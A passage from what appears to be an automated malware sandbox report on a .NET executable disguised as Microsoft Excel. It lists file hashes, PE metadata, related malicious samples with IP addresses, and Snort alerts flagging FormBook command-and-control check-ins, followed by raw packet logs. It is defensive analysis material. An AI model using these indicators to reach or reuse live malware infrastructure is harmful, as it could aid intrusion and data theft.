                                                                        crypted.exeGet hashmaliciousBrowse
                                                                        • 216.239.32.21
                                                                        NewOrder.xlsmGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        Order_20180218001.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        SOA.exeGet hashmaliciousBrowse
                                                                        • 35.186.238.101
                                                                        ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        File Downloader [14.5].apkGet hashmaliciousBrowse
                                                                        • 142.250.186.74
                                                                        PO_210222.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        Order83930.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                                        • 216.239.32.21
                                                                        GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                        • 142.250.186.33
                                                                        DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        OVHFRSecuriteInfo.com.Variant.Zusy.368685.25618.exeGet hashmaliciousBrowse
                                                                        • 51.68.21.186
                                                                        Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                                        • 198.27.88.111
                                                                        Quotation Reques.exeGet hashmaliciousBrowse
                                                                        • 51.83.43.226
                                                                        8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                                        • 51.68.21.186
                                                                        iKohUejteO.dllGet hashmaliciousBrowse
                                                                        • 37.187.115.122
                                                                        PO No. 104393019_pdf.exeGet hashmaliciousBrowse
                                                                        • 51.195.53.221
                                                                        nTqV6fxGXT.exeGet hashmaliciousBrowse
                                                                        • 51.254.175.184
                                                                        Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                                                        • 66.70.204.222
                                                                        File Downloader [14.5].apkGet hashmaliciousBrowse
                                                                        • 51.75.61.103
                                                                        PO_210222.exeGet hashmaliciousBrowse
                                                                        • 213.186.33.5
                                                                        SecuriteInfo.com.Trojan.MinerNET.8.3277.exeGet hashmaliciousBrowse
                                                                        • 149.202.83.171
                                                                        qb1fg.dllGet hashmaliciousBrowse
                                                                        • 37.187.115.122
                                                                        legislate.02.21.docGet hashmaliciousBrowse
                                                                        • 94.23.162.163
                                                                        DSUb6KKsK4Get hashmaliciousBrowse
                                                                        • 139.99.239.154
                                                                        7BBkQmAauX.dllGet hashmaliciousBrowse
                                                                        • 37.187.115.122
                                                                        URGENT QUOTATION.exeGet hashmaliciousBrowse
                                                                        • 51.195.53.221
                                                                        Subconract 504.xlsmGet hashmaliciousBrowse
                                                                        • 37.187.115.122
                                                                        87BB0T225KLOI88U44D000DS2F4H414DD.vbsGet hashmaliciousBrowse
                                                                        • 144.217.17.185
                                                                        leaseplan-invoice-831008_xls2.HtMlGet hashmaliciousBrowse
                                                                        • 146.59.152.166
                                                                        (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                                        • 188.165.242.45

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0O9BJfVJi6fEMoS.exe.log
                                                                        Process:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.355304211458859
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.607328217239554
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:0O9BJfVJi6fEMoS.exe
                                                                        File size:816640
                                                                        MD5:18ec78e09155c046a203fb4dcbc3593f
                                                                        SHA1:40e67eef7c001a8752763616fc9a58170721c27a
                                                                        SHA256:01c5ac824171a164473d92187f8031f2bc7103397fe534f56771d8e9589445e0
                                                                        SHA512:28801c6b546515f4fb67f199f70b160dffb41434bcb465f92d3f20dbad698194f162b443571ea267a1dd7c7ef0bcaf4bb82116c37d3a83433f9d3de28083234e
                                                                        SSDEEP:6144:kxwz1c/yd0cGqrtttttwgGCyWI+XEmlm4gA2YhFp0ksvQZIcQXzjUIBElb6oBbc3:J/wCEzmg4sYhgkqXzwOw47Zf5
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...HO4`..............0......^.......5... ...@....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:f0cac2d8dcdcd43c

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4a35a2
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x60344F48 [Tue Feb 23 00:41:44 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa35500x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x25bbc.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xa15a80xa1600False0.614729073877data6.73482892529IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xa40000x25bbc0x25c00False0.40512468957data5.78348290735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xca0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0xa42b00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xa84d80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xac7000x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xb09280x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xb4b500x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xb8d780x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xbcfa00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xc11c80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xc53f00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_GROUP_ICON0xc96180x84data
                                                                        RT_VERSION0xc969c0x334data
                                                                        RT_MANIFEST0xc99d00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0000 0x04b0
                                                                        LegalCopyrightExcel
                                                                        Assembly Version1.3.6.9
                                                                        InternalName5uoa.exe
                                                                        FileVersion1.3.6.9
                                                                        CompanyNameMicrosoft
                                                                        LegalTrademarksExcel
                                                                        CommentsExcel
                                                                        ProductNameMicrosoft
                                                                        ProductVersion1.3.6.9
                                                                        FileDescriptionExcel
                                                                        OriginalFilename5uoa.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        02/23/21-10:07:40.155996TCP1201ATTACK-RESPONSES 403 Forbidden804976123.227.38.74192.168.2.4
                                                                        02/23/21-10:07:50.751897TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4
                                                                        02/23/21-10:07:56.064671TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4184.106.16.223
                                                                        02/23/21-10:07:56.064671TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4184.106.16.223
                                                                        02/23/21-10:07:56.064671TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4184.106.16.223
                                                                        02/23/21-10:08:08.227961TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4202.66.173.116
                                                                        02/23/21-10:08:08.227961TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4202.66.173.116
                                                                        02/23/21-10:08:08.227961TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4202.66.173.116
                                                                        02/23/21-10:08:23.806049TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.494.23.162.163
                                                                        02/23/21-10:08:23.806049TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.494.23.162.163
                                                                        02/23/21-10:08:23.806049TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.494.23.162.163

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 23, 2021 10:07:34.121632099 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.315769911 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.316106081 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.316319942 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.674912930 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.805005074 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.844446898 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.844474077 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.844491005 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.844508886 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.844638109 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.844691038 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:34.999042988 CET8049755142.91.239.112192.168.2.4
                                                                        Feb 23, 2021 10:07:34.999223948 CET4975580192.168.2.4142.91.239.112
                                                                        Feb 23, 2021 10:07:39.902426004 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:39.943226099 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:39.943336010 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:39.943531036 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:39.984626055 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.155996084 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156027079 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156047106 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156064987 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156079054 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156090975 CET804976123.227.38.74192.168.2.4
                                                                        Feb 23, 2021 10:07:40.156156063 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:40.156194925 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:40.156296968 CET4976180192.168.2.423.227.38.74
                                                                        Feb 23, 2021 10:07:45.275333881 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.339850903 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:45.339967966 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.340125084 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.403935909 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:45.453417063 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:45.453454018 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:45.453608990 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.453644991 CET4976280192.168.2.435.246.6.109
                                                                        Feb 23, 2021 10:07:45.518780947 CET804976235.246.6.109192.168.2.4
                                                                        Feb 23, 2021 10:07:50.558042049 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.604201078 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:50.607954979 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.608117104 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.653506041 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:50.751897097 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:50.751960993 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:50.752162933 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.752336025 CET4976380192.168.2.434.102.136.180
                                                                        Feb 23, 2021 10:07:50.799853086 CET804976334.102.136.180192.168.2.4
                                                                        Feb 23, 2021 10:07:55.911919117 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.064290047 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:07:56.064481020 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.064671040 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.259236097 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:07:56.290729046 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:07:56.290755033 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:07:56.290901899 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.290935993 CET4976480192.168.2.4184.106.16.223
                                                                        Feb 23, 2021 10:07:56.444189072 CET8049764184.106.16.223192.168.2.4
                                                                        Feb 23, 2021 10:08:01.611073017 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:01.908994913 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:01.909262896 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:01.909493923 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:02.207236052 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:02.207866907 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:02.207880974 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:02.208501101 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:02.208548069 CET4976580192.168.2.4118.27.99.84
                                                                        Feb 23, 2021 10:08:02.506582975 CET8049765118.27.99.84192.168.2.4
                                                                        Feb 23, 2021 10:08:08.045314074 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.227328062 CET8049766202.66.173.116192.168.2.4
                                                                        Feb 23, 2021 10:08:08.227575064 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.227961063 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.410000086 CET8049766202.66.173.116192.168.2.4
                                                                        Feb 23, 2021 10:08:08.410028934 CET8049766202.66.173.116192.168.2.4
                                                                        Feb 23, 2021 10:08:08.410331011 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.410443068 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:08.592272997 CET8049766202.66.173.116192.168.2.4
                                                                        Feb 23, 2021 10:08:08.592480898 CET4976680192.168.2.4202.66.173.116
                                                                        Feb 23, 2021 10:08:18.563910007 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.613535881 CET8049769160.153.136.3192.168.2.4
                                                                        Feb 23, 2021 10:08:18.613718987 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.614079952 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.663569927 CET8049769160.153.136.3192.168.2.4
                                                                        Feb 23, 2021 10:08:18.663773060 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.663826942 CET4976980192.168.2.4160.153.136.3
                                                                        Feb 23, 2021 10:08:18.713541031 CET8049769160.153.136.3192.168.2.4
                                                                        Feb 23, 2021 10:08:23.760878086 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.805603981 CET804977094.23.162.163192.168.2.4
                                                                        Feb 23, 2021 10:08:23.805742979 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.806049109 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.850438118 CET804977094.23.162.163192.168.2.4
                                                                        Feb 23, 2021 10:08:23.850476980 CET804977094.23.162.163192.168.2.4
                                                                        Feb 23, 2021 10:08:23.850505114 CET804977094.23.162.163192.168.2.4
                                                                        Feb 23, 2021 10:08:23.850712061 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.850756884 CET4977080192.168.2.494.23.162.163
                                                                        Feb 23, 2021 10:08:23.895284891 CET804977094.23.162.163192.168.2.4

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 23, 2021 10:06:16.121627092 CET53646468.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:18.085860014 CET6529853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:18.145257950 CET53652988.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:19.214610100 CET5912353192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:19.272248983 CET53591238.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:19.453921080 CET5453153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:19.515734911 CET53545318.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:20.101125002 CET4971453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:20.149836063 CET53497148.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:21.541256905 CET5802853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:21.590028048 CET53580288.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:22.953357935 CET5309753192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:23.005038023 CET53530978.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:24.322851896 CET4925753192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:24.382301092 CET53492578.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:25.776557922 CET6238953192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:25.828144073 CET53623898.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:26.801522970 CET4991053192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:26.851269007 CET53499108.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:28.053173065 CET5585453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:28.104880095 CET53558548.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:32.821118116 CET6454953192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:32.872729063 CET53645498.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:34.056159973 CET6315353192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:34.104953051 CET53631538.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:35.507694960 CET5299153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:35.558259010 CET53529918.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:38.171195030 CET5370053192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:38.222738981 CET53537008.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:39.643234015 CET5172653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:39.704479933 CET53517268.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:41.249780893 CET5679453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:41.306982040 CET53567948.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:50.383728981 CET5653453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:50.432409048 CET53565348.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:57.076761007 CET5662753192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:57.128460884 CET53566278.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:58.234647036 CET5662153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:58.283346891 CET53566218.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:06:59.444823027 CET6311653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:06:59.493491888 CET53631168.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:00.622454882 CET6407853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:00.674197912 CET53640788.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:10.865366936 CET6480153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:10.924160957 CET53648018.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:22.158035040 CET6172153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:22.219904900 CET53617218.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:23.750588894 CET5125553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:23.823115110 CET53512558.8.8.8192.168.2.4
